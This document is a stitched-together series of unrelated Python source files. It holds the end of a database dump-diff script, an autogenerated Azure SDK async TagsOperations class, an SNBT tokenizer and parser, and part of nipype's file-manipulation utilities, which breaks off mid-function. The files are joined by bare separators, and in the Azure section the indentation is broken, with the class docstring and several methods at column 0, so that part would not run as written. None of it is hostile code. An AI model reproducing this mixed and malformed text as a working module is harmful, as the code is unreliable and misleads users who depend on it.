        dump_db(db_driver, NEW_DB, new_version, NEW_DUMP)
        diff_files(ORIG_DUMP, NEW_DUMP)
    finally:
        # always restore the user's branch and clean up the dump files
        git_checkout(users_branch)
        if os.path.exists(ORIG_DUMP):
            os.unlink(ORIG_DUMP)
        if os.path.exists(NEW_DUMP):
            os.unlink(NEW_DUMP)
# Script entry point.
if __name__ == "__main__":
    main()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._tags_operations import build_create_or_update_request, build_create_or_update_value_request, build_delete_request, build_delete_value_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TagsOperations:
"""TagsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        # Keep references to the shared pipeline client, configuration and
        # (de)serializers; every operation in this group routes through them.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace_async
    async def delete_value(
        self,
        tag_name: str,
        tag_value: str,
        **kwargs: Any
    ) -> None:
        """Deletes a tag value.

        :param tag_name: The name of the tag.
        :type tag_name: str
        :param tag_value: The value of the tag to delete.
        :type tag_value: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        # map auth/not-found/conflict statuses to richer azure-core errors;
        # callers may extend/override the mapping via kwargs
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        request = build_delete_value_request(
            tag_name=tag_name,
            tag_value=tag_value,
            subscription_id=self._config.subscription_id,
            template_url=self.delete_value.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 200 (deleted) and 204 (no content) are both success for delete
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    delete_value.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}/tagValues/{tagValue}'}  # type: ignore
@distributed_trace_async
async def create_or_update_value(
self,
tag_name: str,
tag_value: str,
**kwargs: Any
) -> "_models.TagValue":
"""Creates a tag value. The name of the tag must already exist.
:param tag_name: The name of the tag.
:type tag_name: str
:param tag_value: The value of the tag to create.
:type tag_value: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TagValue, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2019_08_01.models.TagValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TagValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_create_or_update_value_request(
tag_name=tag_name,
tag_value=tag_value,
subscription_id=self._config.subscription_id,
template_url=self.create_or_update_value.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('TagValue', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('TagValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_value.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}/tagValues/{tagValue}'} # type: ignore
@distributed_trace_async
async def create_or_update(
    self,
    tag_name: str,
    **kwargs: Any
) -> "_models.TagDetails":
    """Creates a tag in the subscription.

    The tag name can have a maximum of 512 characters and is case insensitive. Tag names created by
    Azure have prefixes of microsoft, azure, or windows. You cannot create tags with one of these
    prefixes.

    :param tag_name: The name of the tag to create.
    :type tag_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: TagDetails, or the result of cls(response)
    :rtype: ~azure.mgmt.resource.resources.v2019_08_01.models.TagDetails
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.TagDetails"]
    # Map auth/not-found/conflict codes to typed azure-core exceptions;
    # callers may override or extend via the ``error_map`` kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    request = build_create_or_update_request(
        tag_name=tag_name,
        subscription_id=self._config.subscription_id,
        template_url=self.create_or_update.metadata['url'],
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200, 201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    # Both 200 (updated) and 201 (created) return a TagDetails payload.
    if response.status_code == 200:
        deserialized = self._deserialize('TagDetails', pipeline_response)

    if response.status_code == 201:
        deserialized = self._deserialize('TagDetails', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized

create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}'}  # type: ignore
@distributed_trace_async
async def delete(
    self,
    tag_name: str,
    **kwargs: Any
) -> None:
    """Deletes a tag from the subscription.

    You must remove all values from a resource tag before you can delete it.

    :param tag_name: The name of the tag.
    :type tag_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    request = build_delete_request(
        tag_name=tag_name,
        subscription_id=self._config.subscription_id,
        template_url=self.delete.metadata['url'],
    )
    request = _convert_request(request)
    request.url = self._client.format_url(request.url)

    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 (deleted) and 204 (no content) are both success; anything else
    # is surfaced as an ARM error.
    if response.status_code not in [200, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})

delete.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames/{tagName}'}  # type: ignore
@distributed_trace
def list(
    self,
    **kwargs: Any
) -> AsyncIterable["_models.TagsListResult"]:
    """Gets the names and values of all resource tags that are defined in a subscription.

    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either TagsListResult or the result of cls(response)
    :rtype:
     ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.resources.v2019_08_01.models.TagsListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.TagsListResult"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    def prepare_request(next_link=None):
        # The first page uses the operation's templated URL; subsequent
        # pages follow the service-provided next_link verbatim.
        if not next_link:
            request = build_list_request(
                subscription_id=self._config.subscription_id,
                template_url=self.list.metadata['url'],
            )
            request = _convert_request(request)
            request.url = self._client.format_url(request.url)
        else:
            request = build_list_request(
                subscription_id=self._config.subscription_id,
                template_url=next_link,
            )
            request = _convert_request(request)
            request.url = self._client.format_url(request.url)
            request.method = "GET"
        return request

    async def extract_data(pipeline_response):
        # Returns (continuation token, async iterable of page items).
        deserialized = self._deserialize("TagsListResult", pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, AsyncList(list_of_elem)

    async def get_next(next_link=None):
        request = prepare_request(next_link)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        return pipeline_response

    return AsyncItemPaged(
        get_next, extract_data
    )

list.metadata = {'url': '/subscriptions/{subscriptionId}/tagNames'}  # type: ignore
| |
"""This module exposes utilities for parsing snbt.
Exported functions:
parse_nbt -- Helper function that parses nbt literals
tokenize -- Generator that lazily yields tokens from a string
Exported classes:
Parser -- Class that can parse nbt tags from a literal token stream
Exported exceptions:
InvalidLiteral -- Raised when parsing invalid nbt literals
"""
__all__ = ["parse_nbt", "InvalidLiteral", "tokenize", "Parser"]
import re
from collections import namedtuple
from .serializer import STRING_QUOTES, ESCAPE_SEQUENCES, ESCAPE_SUBS
from ..tag import (
Byte,
Short,
Int,
Long,
Float,
Double,
ByteArray,
String,
List,
Compound,
IntArray,
LongArray,
OutOfRange,
IncompatibleItemType,
)
# Token definition
ESCAPE_REGEX = re.compile(r"\\.")

# Named alternatives tried in declaration order when building the master
# regex below; "INVALID" is last so it only matches when nothing else does.
TOKENS = {
    "QUOTED_STRING": "|".join(
        fr"{q}(?:{ESCAPE_REGEX.pattern}|[^\\])*?{q}" for q in STRING_QUOTES
    ),
    "NUMBER": r"[+-]?(?:[0-9]*?\.[0-9]+|[0-9]+\.[0-9]*?|[1-9][0-9]*|0)([eE][+-]?[0-9]+)?[bslfdBSLFD]?(?![a-zA-Z0-9._+-])",
    "STRING": r"[a-zA-Z0-9._+-]+",
    "COMPOUND": r"\{",
    "CLOSE_COMPOUND": r"\}",
    "BYTE_ARRAY": r"\[B;",
    "INT_ARRAY": r"\[I;",
    "LONG_ARRAY": r"\[L;",
    "LIST": r"\[",
    "CLOSE_BRACKET": r"\]",
    "COLON": r":",
    "COMMA": r",",
    "INVALID": r".+?",
}

# Build the regex (each token becomes a named group, whitespace-tolerant)
TOKENS_REGEX = re.compile(
    "|".join(fr"\s*(?P<{key}>{value})\s*" for key, value in TOKENS.items())
)

# Associate number suffixes to tag types (no suffix means Int or Double)
NUMBER_SUFFIXES = {"b": Byte, "s": Short, "l": Long, "f": Float, "d": Double}

# Define literal aliases
LITERAL_ALIASES = {
    "true": Byte(1),
    "false": Byte(0),
}
# Custom errors
class InvalidLiteral(ValueError):
    """Error raised when an nbt literal cannot be parsed.

    Instantiate with two arguments: a ``(start_index, end_index)`` tuple
    locating the problem inside the nbt string, and the actual error
    message.
    """

    def __str__(self):
        span, message = self.args
        return f"{message} at position {span[0]}"
# User-friendly helper
def parse_nbt(literal):
    """Parse a literal nbt string and return the resulting tag."""
    parser = Parser(tokenize(literal))
    result = parser.parse()

    end = parser.token_span[1]
    trailing = literal[end:]
    if trailing.strip():
        # Point the error span at the unconsumed tail of the input.
        parser.token_span = end, end + len(trailing)
        raise parser.error(f"Expected end of string but got {trailing!r}")

    return result
# Implement tokenization
# A lexed token: the matched group name, the stripped text, and the
# (start, end) span within the input string.
Token = namedtuple("Token", ["type", "value", "span"])


def tokenize(string):
    """Match and yield all the tokens of the input string."""
    yield from (
        Token(m.lastgroup, m.group().strip(), m.span())
        for m in TOKENS_REGEX.finditer(string)
    )
# Implement parser
class Parser:
    """Nbt literal parser.

    The parser needs to be instantiated with a token stream as argument.
    Using the `parse` method will return the corresponding nbt tag.

    The parser will raise an InvalidLiteral exception if it encounters
    an invalid nbt literal while parsing.
    """

    def __init__(self, token_stream):
        self.token_stream = iter(token_stream)
        self.current_token = None
        self.token_span = (0, 0)
        # Prime the stream; raises "Unexpected end of input" when empty.
        self.next()

    def error(self, message):
        """Create an InvalidLiteral using the current token position."""
        return InvalidLiteral(self.token_span, message)

    def next(self):
        """Move to the next token in the token stream."""
        self.current_token = next(self.token_stream, None)
        if self.current_token is None:
            # Collapse the span to the end of the last consumed token so
            # the reported position points just past the input.
            self.token_span = self.token_span[1], self.token_span[1]
            raise self.error("Unexpected end of input")
        self.token_span = self.current_token.span
        return self

    def parse(self):
        """Parse and return an nbt literal from the token stream."""
        token_type = self.current_token.type.lower()
        # Dispatch on the token type to parse_compound, parse_number, ...
        handler = getattr(self, f"parse_{token_type}", None)
        if handler is None:
            raise self.error(f"Invalid literal {self.current_token.value!r}")
        return handler()

    def parse_quoted_string(self):
        """Parse a quoted string from the token stream."""
        return String(self.unquote_string(self.current_token.value))

    def parse_number(self):
        """Parse a number from the token stream."""
        value = self.current_token.value
        suffix = value[-1].lower()

        try:
            if suffix in NUMBER_SUFFIXES:
                return NUMBER_SUFFIXES[suffix](value[:-1])
            # No suffix: a decimal point selects Double, otherwise Int.
            return Double(value) if "." in value else Int(value)
        except (OutOfRange, ValueError):
            # Out-of-range or malformed numbers degrade to plain strings.
            return String(value)

    def parse_string(self):
        """Parse a regular unquoted string from the token stream."""
        # "true"/"false" (case-insensitive) alias to Byte(1)/Byte(0).
        aliased_value = LITERAL_ALIASES.get(self.current_token.value.lower())
        if aliased_value is not None:
            return aliased_value
        return String(self.current_token.value)

    def collect_tokens_until(self, token_type):
        """Yield the item tokens in a comma-separated tag collection."""
        self.next()
        # Empty collection: the closing token follows immediately.
        if self.current_token.type == token_type:
            return

        while True:
            yield self.current_token

            self.next()
            if self.current_token.type == token_type:
                return
            if self.current_token.type != "COMMA":
                raise self.error(f"Expected comma but got {self.current_token.value!r}")
            self.next()

    def parse_compound(self):
        """Parse a compound from the token stream."""
        compound_tag = Compound()
        for token in self.collect_tokens_until("CLOSE_COMPOUND"):
            item_key = token.value
            if token.type not in ("NUMBER", "STRING", "QUOTED_STRING"):
                raise self.error(f"Expected compound key but got {item_key!r}")
            if token.type == "QUOTED_STRING":
                item_key = self.unquote_string(item_key)

            if self.next().current_token.type != "COLON":
                raise self.error(f"Expected colon but got {self.current_token.value!r}")

            self.next()
            compound_tag[item_key] = self.parse()
        return compound_tag

    def array_items(self, number_type, *, number_suffix=""):
        """Parse and yield array items from the token stream."""
        for token in self.collect_tokens_until("CLOSE_BRACKET"):
            is_number = token.type == "NUMBER"
            value = token.value.lower()
            # Each element must be a number carrying the array's suffix
            # (e.g. "1b" inside a byte array).
            if not (is_number and value.endswith(number_suffix)):
                raise self.error(f"Invalid {number_type} array element {token.value!r}")
            yield int(value.replace(number_suffix, ""))

    def parse_byte_array(self):
        """Parse a byte array from the token stream."""
        return ByteArray(list(self.array_items("byte", number_suffix="b")))

    def parse_int_array(self):
        """Parse an int array from the token stream."""
        return IntArray(list(self.array_items("int")))

    def parse_long_array(self):
        """Parse a long array from the token stream."""
        return LongArray(list(self.array_items("long", number_suffix="l")))

    def parse_list(self):
        """Parse a list from the token stream."""
        try:
            return List(
                [self.parse() for _ in self.collect_tokens_until("CLOSE_BRACKET")]
            )
        except IncompatibleItemType as exc:
            raise self.error(
                f"Item {str(exc.item)!r} is not a {exc.subtype.__name__} tag"
            ) from None

    def parse_invalid(self):
        """Parse an invalid token from the token stream."""
        raise self.error(f"Invalid token {self.current_token.value!r}")

    def unquote_string(self, string):
        """Return the unquoted value of a quoted string."""
        value = string[1:-1]
        # The escape sequence tied to the delimiting quote character is
        # not allowed inside this string (mapping defined in .serializer).
        forbidden_sequences = {ESCAPE_SUBS[STRING_QUOTES[string[0]]]}
        valid_sequences = set(ESCAPE_SEQUENCES) - forbidden_sequences

        for seq in ESCAPE_REGEX.findall(value):
            if seq not in valid_sequences:
                raise self.error(f'Invalid escape sequence "{seq}"')

        for seq, sub in ESCAPE_SEQUENCES.items():
            value = value.replace(seq, sub)

        return value
| |
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
from __future__ import print_function, division, unicode_literals, absolute_import
import sys
import pickle
import subprocess
import gzip
import hashlib
import locale
from hashlib import md5
import os
import re
import shutil
import posixpath
import simplejson as json
import numpy as np
from builtins import str, bytes, open
from .. import logging, config
from .misc import is_container
from ..interfaces.traits_extension import isdefined
from future import standard_library
standard_library.install_aliases()
fmlogger = logging.getLogger('utils')

# Extensions that travel together: copying/renaming one member of a set
# should also operate on its siblings (e.g. Analyze .hdr/.img pairs).
related_filetype_sets = [
    ('.hdr', '.img', '.mat'),
    ('.nii', '.mat'),
    ('.BRIK', '.HEAD'),
]
class FileNotFoundError(Exception):
    """Exception raised for missing files.

    NOTE(review): this shadows the Python 3 builtin of the same name —
    presumably kept for Python 2 compatibility; confirm before removing.
    """
    pass
def split_filename(fname):
    """Split a filename into parts: path, base filename and extension.

    Multi-part extensions such as ``.nii.gz`` and ``.tar.gz`` are kept
    together instead of being split at the last dot.

    Parameters
    ----------
    fname : str
        file or path name

    Returns
    -------
    pth : str
        base path from fname
    fname : str
        filename from fname, without extension
    ext : str
        file extension from fname

    Examples
    --------
    >>> from nipype.utils.filemanip import split_filename
    >>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
    >>> pth # doctest: +ALLOW_UNICODE
    '/home/data'
    >>> fname # doctest: +ALLOW_UNICODE
    'subject'
    >>> ext # doctest: +ALLOW_UNICODE
    '.nii.gz'
    """
    special_extensions = [".nii.gz", ".tar.gz"]

    pth, base = os.path.split(fname)
    for special_ext in special_extensions:
        n = len(special_ext)
        # Case-insensitive match that preserves the original casing of
        # the extension; require a non-empty stem before the extension.
        if len(base) > n and base[-n:].lower() == special_ext.lower():
            return pth, base[:-n], base[-n:]

    stem, ext = os.path.splitext(base)
    return pth, stem, ext
def to_str(value):
    """
    Manipulates ordered dicts before they are hashed (Py2/3 compat.)
    """
    # On Python 3, plain str() already produces the canonical repr;
    # Python 2 needs the u-prefix stripping done by to_str_py27.
    if sys.version_info[0] > 2:
        return str(value)
    return to_str_py27(value)
def to_str_py27(value):
    """
    Encode dictionary for python 2.

    Recursively renders dicts/lists/tuples like Python 3's str() would:
    unicode reprs have their leading ``u`` prefix stripped so hashes
    computed on Python 2 match those computed on Python 3.
    """
    if isinstance(value, dict):
        entry = '{}: {}'.format
        retval = '{'
        for key, val in list(value.items()):
            if len(retval) > 1:
                retval += ', '
            kenc = repr(key)
            # Strip the u-prefix from unicode key reprs (u'x' -> 'x').
            if kenc.startswith(("u'", 'u"')):
                kenc = kenc[1:]
            venc = to_str_py27(val)
            if venc.startswith(("u'", 'u"')):
                venc = venc[1:]
            retval += entry(kenc, venc)
        retval += '}'
        return retval

    istuple = isinstance(value, tuple)
    if isinstance(value, (tuple, list)):
        retval = '(' if istuple else '['
        nels = len(value)
        for i, v in enumerate(value):
            venc = to_str_py27(v)
            if venc.startswith(("u'", 'u"')):
                venc = venc[1:]
            retval += venc
            if i < nels - 1:
                retval += ', '
        # Single-element tuples keep their trailing comma: (1,)
        if istuple and nels == 1:
            retval += ','
        retval += ')' if istuple else ']'
        return retval

    # Python 2 only: repr() returns bytes here, decode to unicode.
    retval = repr(value).decode()
    if retval.startswith(("u'", 'u"')):
        retval = retval[1:]
    return retval
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
    """Manipulates path and name of input filename

    Parameters
    ----------
    fname : string
        A filename (may or may not include path)
    prefix : string
        Characters to prepend to the filename
    suffix : string
        Characters to append to the filename
    newpath : string
        Path to replace the path of the input fname
    use_ext : boolean
        If True (default), appends the extension of the original file
        to the output name.

    Returns
    -------
    Absolute path of the modified filename

    >>> from nipype.utils.filemanip import fname_presuffix
    >>> fname = 'foo.nii.gz'
    >>> fname_presuffix(fname,'pre','post','/tmp') # doctest: +ALLOW_UNICODE
    '/tmp/prefoopost.nii.gz'
    """
    pth, base, ext = split_filename(fname)
    if not use_ext:
        ext = ''
    # newpath may be a traits Undefined sentinel; only honor real values.
    if newpath and isdefined(newpath):
        pth = os.path.abspath(newpath)
    return os.path.join(pth, prefix + base + suffix + ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None, use_ext=True):
    """Calls fname_presuffix for a list of files.
    """
    return [
        fname_presuffix(fname, prefix, suffix, newpath, use_ext)
        for fname in fnames
    ]
def hash_rename(filename, hashvalue):
    """Rename a file, embedding ``hashvalue`` as a ``_0x<hash>`` marker
    before the extension, keeping the original directory.
    """
    path, name, ext = split_filename(filename)
    return os.path.join(path, '{}_0x{}{}'.format(name, hashvalue, ext))
def check_forhash(filename):
    """Check whether a filename carries an embedded ``_0x<md5>`` marker.

    Parameters
    ----------
    filename : str or list
        File name, or a list of file names (only the first is inspected).

    Returns
    -------
    tuple
        ``(True, [hash_marker, ...])`` when one or more ``_0x`` + 32
        hex-char markers occur in the base name, ``(False, None)``
        otherwise.
    """
    if isinstance(filename, list):
        filename = filename[0]
    path, name = os.path.split(filename)
    # Single findall() pass replaces the original search()-then-findall()
    # which scanned the same name twice with the same pattern.
    hashvalue = re.findall('(_0x[a-z0-9]{32})', name)
    if hashvalue:
        return True, hashvalue
    return False, None
def hash_infile(afile, chunk_len=8192, crypto=hashlib.md5):
    """Compute the checksum of a file, reading it in bounded chunks.

    Parameters
    ----------
    afile : str
        Path of the file to hash.
    chunk_len : int
        Bytes read per iteration, keeping memory use bounded.
    crypto : callable
        Hash constructor from :mod:`hashlib` (default: ``md5``).

    Returns
    -------
    str or None
        Hex digest of the file contents, or ``None`` when ``afile`` is
        not a regular file.
    """
    if not os.path.isfile(afile):
        return None
    crypto_obj = crypto()
    with open(afile, 'rb') as fp:
        # iter() with a b'' sentinel reads until EOF without an explicit
        # break; also avoids the original's `hex` builtin shadowing.
        for chunk in iter(lambda: fp.read(chunk_len), b''):
            crypto_obj.update(chunk)
    return crypto_obj.hexdigest()
def hash_timestamp(afile):
    """Compute an md5 hex digest of a file's size and mtime.

    Returns ``None`` when ``afile`` is not a regular file.
    """
    if not os.path.isfile(afile):
        return None
    info = os.stat(afile)
    digest = md5()
    digest.update(str(info.st_size).encode())
    digest.update(str(info.st_mtime).encode())
    return digest.hexdigest()
def _generate_cifs_table():
"""Construct a reverse-length-ordered list of mount points that
fall under a CIFS mount.
This precomputation allows efficient checking for whether a given path
would be on a CIFS filesystem.
On systems without a ``mount`` command, or with no CIFS mounts, returns an
empty list.
"""
exit_code, output = subprocess.getstatusoutput("mount")
# Not POSIX
if exit_code != 0:
return []
# (path, fstype) tuples, sorted by path length (longest first)
mount_info = sorted((line.split()[2:5:2] for line in output.splitlines()),
key=lambda x: len(x[0]),
reverse=True)
cifs_paths = [path for path, fstype in mount_info if fstype == 'cifs']
return [mount for mount in mount_info
if any(mount[0].startswith(path) for path in cifs_paths)]
# Computed once at import time; mounts are assumed stable for the
# lifetime of the process.
_cifs_table = _generate_cifs_table()


def on_cifs(fname):
    """Checks whether a file path is on a CIFS filesystem mounted in a
    POSIX host (i.e., has the ``mount`` command).

    On Windows, Docker mounts host directories into containers through
    CIFS shares, which has support for Minshall+French symlinks, or text
    files that the CIFS driver exposes to the OS as symlinks.

    We have found that under concurrent access to the filesystem, this
    feature can result in failures to create or read recently-created
    symlinks, leading to inconsistent behavior and ``FileNotFoundError``s.

    This check is written to support disabling symlinks on CIFS shares.
    """
    # Only the first match (most recent parent) counts: the table is
    # sorted longest-path-first by _generate_cifs_table().
    for fspath, fstype in _cifs_table:
        if fname.startswith(fspath):
            return fstype == 'cifs'
    return False
def copyfile(originalfile, newfile, copy=False, create_new=False,
             hashmethod=None, use_hardlink=False,
             copy_related_files=True):
    """Copy or link ``originalfile`` to ``newfile``.

    If ``use_hardlink`` is True, and the file can be hard-linked, then a
    link is created, instead of copying the file.

    If a hard link is not created and ``copy`` is False, then a symbolic
    link is created.

    Parameters
    ----------
    originalfile : str
        full path to original file
    newfile : str
        full path to new file
    copy : Bool
        specifies whether to copy or symlink files
        (default=False) but only for POSIX systems
    create_new : Bool
        if True, never overwrite: an unused ``_cNNNN``-suffixed name is
        chosen when ``newfile`` already exists
    hashmethod : str or None
        'timestamp' or 'content'; defaults to the configured
        ``execution.hash_method``
    use_hardlink : Bool
        specifies whether to hard-link files, when able
        (Default=False), taking precedence over copy
    copy_related_files : Bool
        specifies whether to also operate on related files, as defined in
        ``related_filetype_sets``

    Returns
    -------
    str
        The destination path actually written (may differ from
        ``newfile`` when ``create_new`` is True).
    """
    newhash = None
    orighash = None
    fmlogger.debug(newfile)

    if create_new:
        # Bump the _cNNNN counter until we find an unused name.
        while os.path.exists(newfile):
            base, fname, ext = split_filename(newfile)
            s = re.search('_c[0-9]{4,4}$', fname)
            i = 0
            if s:
                i = int(s.group()[2:]) + 1
                fname = fname[:-6] + "_c%04d" % i
            else:
                fname += "_c%04d" % i
            newfile = base + os.sep + fname + ext

    if hashmethod is None:
        hashmethod = config.get('execution', 'hash_method').lower()

    # Don't try creating symlinks on CIFS
    if copy is False and on_cifs(newfile):
        copy = True

    # Existing file
    # -------------
    # Options:
    #   symlink
    #       to regular file originalfile            (keep if symlinking)
    #       to same dest as symlink originalfile    (keep if symlinking)
    #       to other file                           (unlink)
    #   regular file
    #       hard link to originalfile               (keep)
    #       copy of file (same hash)                (keep)
    #       different file (diff hash)              (unlink)
    keep = False
    if os.path.lexists(newfile):
        if os.path.islink(newfile):
            if all((os.readlink(newfile) == os.path.realpath(originalfile),
                    not use_hardlink, not copy)):
                keep = True
        elif posixpath.samefile(newfile, originalfile):
            keep = True
        else:
            if hashmethod == 'timestamp':
                hashfn = hash_timestamp
            elif hashmethod == 'content':
                hashfn = hash_infile
            newhash = hashfn(newfile)
            fmlogger.debug("File: %s already exists,%s, copy:%d" %
                           (newfile, newhash, copy))
            orighash = hashfn(originalfile)
            keep = newhash == orighash
        if keep:
            fmlogger.debug("File: %s already exists, not overwriting, copy:%d"
                           % (newfile, copy))
        else:
            os.unlink(newfile)

    # New file
    # --------
    # use_hardlink & can_hardlink => hardlink
    # ~hardlink & ~copy & can_symlink => symlink
    # ~hardlink & ~symlink => copy
    if not keep and use_hardlink:
        try:
            fmlogger.debug("Linking File: %s->%s" % (newfile, originalfile))
            # Use realpath to avoid hardlinking symlinks
            os.link(os.path.realpath(originalfile), newfile)
        except OSError:
            use_hardlink = False  # Disable hardlink for associated files
        else:
            keep = True

    if not keep and not copy and os.name == 'posix':
        try:
            fmlogger.debug("Symlinking File: %s->%s" % (newfile, originalfile))
            os.symlink(originalfile, newfile)
        except OSError:
            copy = True  # Disable symlink for associated files
        else:
            keep = True

    if not keep:
        try:
            fmlogger.debug("Copying File: %s->%s" % (newfile, originalfile))
            shutil.copyfile(originalfile, newfile)
        except shutil.Error as e:
            # BUGFIX: the original logged ``e.message``, which only exists
            # on Python 2; str(e) works on both 2 and 3.
            fmlogger.warn(str(e))

    # Associated files
    if copy_related_files:
        related_file_pairs = (get_related_files(f, include_this_file=False)
                              for f in (originalfile, newfile))
        for alt_ofile, alt_nfile in zip(*related_file_pairs):
            if os.path.exists(alt_ofile):
                # copy_related_files=False prevents infinite recursion.
                copyfile(alt_ofile, alt_nfile, copy, hashmethod=hashmethod,
                         use_hardlink=use_hardlink, copy_related_files=False)

    return newfile
def get_related_files(filename, include_this_file=True):
    """Returns a list of related files, as defined in
    ``related_filetype_sets``, for a filename. (e.g., Nifti-Pair, Analyze (SPM)
    and AFNI files).

    Parameters
    ----------
    filename : str
        File name to find related filetypes of.
    include_this_file : bool
        If true, output includes the input filename.
    """
    path, name, this_type = split_filename(filename)
    related_files = [
        os.path.join(path, name + related_type)
        for type_set in related_filetype_sets
        if this_type in type_set
        for related_type in type_set
        if include_this_file or related_type != this_type
    ]
    # Fall back to the input itself when its extension has no siblings.
    return related_files or [filename]
def copyfiles(filelist, dest, copy=False, create_new=False):
    """Copy or symlink files in ``filelist`` to ``dest`` directory.

    Parameters
    ----------
    filelist : list
        List of files to copy.
    dest : path/files
        full path to destination. If it is a list of length greater
        than 1, then it assumes that these are the names of the new
        files.
    copy : Bool
        specifies whether to copy or symlink files
        (default=False) but only for posix systems

    Returns
    -------
    list
        The new file paths, mirroring the nesting of ``filelist``.
    """
    outfiles = filename_to_list(dest)
    newfiles = []
    for idx, fname in enumerate(filename_to_list(filelist)):
        if isinstance(fname, list):
            # Recurse into nested lists, preserving their structure.
            newfiles.insert(idx, copyfiles(fname, dest, copy=copy,
                                           create_new=create_new))
        else:
            if len(outfiles) > 1:
                destfile = outfiles[idx]
            else:
                destfile = fname_presuffix(fname, newpath=outfiles[0])
            newfiles.insert(idx, copyfile(fname, destfile, copy,
                                          create_new=create_new))
    return newfiles
def filename_to_list(filename):
    """Returns a list given either a string or a list
    """
    if isinstance(filename, (str, bytes)):
